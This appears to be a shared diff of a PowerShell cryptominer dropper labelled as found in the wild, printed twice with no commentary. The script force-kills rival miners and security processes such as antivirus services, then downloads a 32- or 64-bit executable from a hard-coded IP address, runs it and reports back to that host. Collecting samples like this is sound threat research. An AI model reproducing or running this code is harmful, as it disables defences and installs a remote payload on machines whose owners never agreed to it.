nma-io · November 2, 2018 22:44 · Ninjtrovert · Mar 15, 2018
diff --git a/CryptoMiner Found in wild b/CryptoMiner Found in wild
 $counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples
 $malwares = "Kilence","alm","vag_pag","office","pws_lotinfo_trans","aspnet_state","tasksvr","ekrn","iems","secscan","mysql","trustedinstaller","safedogsiteiis","write","360cleanhelper","sw_magik_gss","wd160session","smsservice","360rps","win1nit","npinst","xmrig","mrservicehost","360rp","hrate","xmr","laozi","csrs","postgres","csrv","safedogguardcenter","sl_gps_msg","javaservice","lsass","taskngr","dc","aipcopywlh64","xqjxke","sl_gps_rule","svhosts","qqexternal","streamserver","qv","sapstartsrv","avgcsrva","360se","alarmservice","nscpucnminer64","thunderplatform","xmrig32","ntrtscan","arp","a8service","msiexev","rsturboball","sl_join_bb808","ramdial","sl_upload809_1","beasvcx64","ptzproxyservice","connect","runtimebroker","system64","win1ogin","sql31","vmware","systemiissec","werfault","w3wp","snmpd","conhosts","taskhots","icrawlers_fbs_cjd","systmss","calcserviced","wmiprvser","bcompare","helppanc","memcached","qqpctray","see64","sl_join_srv","svchsot","reportengine","lms","winlogo","360tray","sppscv","nmsclient","mysqld","stest","apache","waterfox","teamviewer","mssql","mscorswv","jp2launcher","service","launch","tktbqi","mssys","taskhost","coiacy","networkmanager","systemtask","runtime","msmpeng","7za","reportingservicesservice","firefox","zhudongfangyu","wudfhost","javaw","mscl","lsmosee","cs","secury","db2syscs","xmr86","httpd","esetonlinescanner_enu","java","magserver","ravmond","chrome","serviceshost","update_windows","chinelada","system","carboniteservice","perl","ctsrvr","voipswitch","qqprotect","taskmgr","scope","vrmserver","wmiprvse","centralclient","csres","mcshield","mgmt","seccopy","wininits","decodeprocess","dvsvct","csrss","dvsvcs","update64","regsvr32","sl_gps_gpsserver","servicewatchdog","mininews","dllhost","msiexec","ntvdm","ivms","oneclickservice","cidaemon","spoolvs","cloudhelper","desktoplayer","conhost","messageserver","vshell","vag_stream","logon","powershell","svchosts3","servisce","vtdu","stream","process","svchost","qqpcnetflow","tomcat7","tomcat6","spoolsv","spectroserver","sceserver","filesearcherindex","tomcat8","sqlservr","mapa","nlbrute","360sdupd","winlogon","ccsvchst","csc","safedogtray","appserver","hpbsm_wde","ksmsvc","tkinstaller","calcclientgyd","smss","ns","mscorsvw","xmrig1","winlogin","qqpcrealtimespeedup","explorer","mscorswu","convert_imagemagick","win1ogins","qqpcrtp","nmsserver","oracle","winlnlts","svchostx","cms_controlclient","services","inteldevicemanager","iexplore","lsmose","frmweb","pag","dcserver","ggtbviewer","winlogan","cpuminer","minergate","cascade","wmiapsrv","nvidia","softupnotify","sl_gps_adapter"
 $malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec","taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31","taskhots","svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows"
 foreach ($counter in $counters) {
  if ($counter.CookedValue -ge 50) {
    if ($counter.InstanceName -eq "idle" -Or $counter.InstanceName -eq "_total") {
      continue
    }
    foreach ($malware in $malwares) {
      if ($counter.InstanceName -eq $malware) {
        Stop-Process -processname $counter.InstanceName -Force
      }
    }
  }
  foreach ($malware2 in $malwares2) {
    if ($counter.InstanceName -eq $malware2) {
      Stop-Process -processname $counter.InstanceName -Force
    }
  }
 }

 $SELF_COPY = "$HOME\win.txt"
 $HSST = "http://200.7.97.205:8086"
 $CALLBACK = $HSST

 $DEFAULT_RFILE = "$HSST/64Kilences.exe"
 $OTHERS_RFILE = "$HSST/32Kilences.exe"

 $LFILE_PATH = "$env:TMP\Drive.exe"

 $DOWNLOADER = New-Object System.Net.WebClient
 $SYSTEM_BIT = [System.IntPtr]::Size
 if ( $SYSTEM_BIT -eq 8 ) {
    $DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH)
 } else {
    $DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH)
 }
 if ( !(Get-Process systemgo -ErrorAction SilentlyContinue) ) {
    $DOWNLOADER.DownloadString("$CALLBACK/?info=w0")
    cmd.exe /c $LFILE_PATH
 } else {
    $DOWNLOADER.DownloadString("$CALLBACK/?info=w9")
 }
	$counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples
	$malwares = "Kilence","alm","vag_pag","office","pws_lotinfo_trans","aspnet_state","tasksvr","ekrn","iems","secscan","mysql","trustedinstaller","safedogsiteiis","write","360cleanhelper","sw_magik_gss","wd160session","smsservice","360rps","win1nit","npinst","xmrig","mrservicehost","360rp","hrate","xmr","laozi","csrs","postgres","csrv","safedogguardcenter","sl_gps_msg","javaservice","lsass","taskngr","dc","aipcopywlh64","xqjxke","sl_gps_rule","svhosts","qqexternal","streamserver","qv","sapstartsrv","avgcsrva","360se","alarmservice","nscpucnminer64","thunderplatform","xmrig32","ntrtscan","arp","a8service","msiexev","rsturboball","sl_join_bb808","ramdial","sl_upload809_1","beasvcx64","ptzproxyservice","connect","runtimebroker","system64","win1ogin","sql31","vmware","systemiissec","werfault","w3wp","snmpd","conhosts","taskhots","icrawlers_fbs_cjd","systmss","calcserviced","wmiprvser","bcompare","helppanc","memcached","qqpctray","see64","sl_join_srv","svchsot","reportengine","lms","winlogo","360tray","sppscv","nmsclient","mysqld","stest","apache","waterfox","teamviewer","mssql","mscorswv","jp2launcher","service","launch","tktbqi","mssys","taskhost","coiacy","networkmanager","systemtask","runtime","msmpeng","7za","reportingservicesservice","firefox","zhudongfangyu","wudfhost","javaw","mscl","lsmosee","cs","secury","db2syscs","xmr86","httpd","esetonlinescanner_enu","java","magserver","ravmond","chrome","serviceshost","update_windows","chinelada","system","carboniteservice","perl","ctsrvr","voipswitch","qqprotect","taskmgr","scope","vrmserver","wmiprvse","centralclient","csres","mcshield","mgmt","seccopy","wininits","decodeprocess","dvsvct","csrss","dvsvcs","update64","regsvr32","sl_gps_gpsserver","servicewatchdog","mininews","dllhost","msiexec","ntvdm","ivms","oneclickservice","cidaemon","spoolvs","cloudhelper","desktoplayer","conhost","messageserver","vshell","vag_stream","logon","powershell","svchosts3","servisce","vtdu","stream","process","svchost","qqpcnetflow","tomcat7","tomcat6","spoolsv","spectroserver","sceserver","filesearcherindex","tomcat8","sqlservr","mapa","nlbrute","360sdupd","winlogon","ccsvchst","csc","safedogtray","appserver","hpbsm_wde","ksmsvc","tkinstaller","calcclientgyd","smss","ns","mscorsvw","xmrig1","winlogin","qqpcrealtimespeedup","explorer","mscorswu","convert_imagemagick","win1ogins","qqpcrtp","nmsserver","oracle","winlnlts","svchostx","cms_controlclient","services","inteldevicemanager","iexplore","lsmose","frmweb","pag","dcserver","ggtbviewer","winlogan","cpuminer","minergate","cascade","wmiapsrv","nvidia","softupnotify","sl_gps_adapter"
	$malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec","taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31","taskhots","svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows"
	foreach ($counter in $counters) {
	if ($counter.CookedValue -ge 50) {
	if ($counter.InstanceName -eq "idle" -Or $counter.InstanceName -eq "_total") {
	continue
	}
	foreach ($malware in $malwares) {
	if ($counter.InstanceName -eq $malware) {
	Stop-Process -processname $counter.InstanceName -Force
	}
	}
	}
	foreach ($malware2 in $malwares2) {
	if ($counter.InstanceName -eq $malware2) {
	Stop-Process -processname $counter.InstanceName -Force
	}
	}
	}

	$SELF_COPY = "$HOME\win.txt"
	$HSST = "http://200.7.97.205:8086"
	$CALLBACK = $HSST

	$DEFAULT_RFILE = "$HSST/64Kilences.exe"
	$OTHERS_RFILE = "$HSST/32Kilences.exe"

	$LFILE_PATH = "$env:TMP\Drive.exe"

	$DOWNLOADER = New-Object System.Net.WebClient
	$SYSTEM_BIT = [System.IntPtr]::Size
	if ( $SYSTEM_BIT -eq 8 ) {
	$DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH)
	} else {
	$DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH)
	}
	if ( !(Get-Process systemgo -ErrorAction SilentlyContinue) ) {
	$DOWNLOADER.DownloadString("$CALLBACK/?info=w0")
	cmd.exe /c $LFILE_PATH
	} else {
	$DOWNLOADER.DownloadString("$CALLBACK/?info=w9")
	}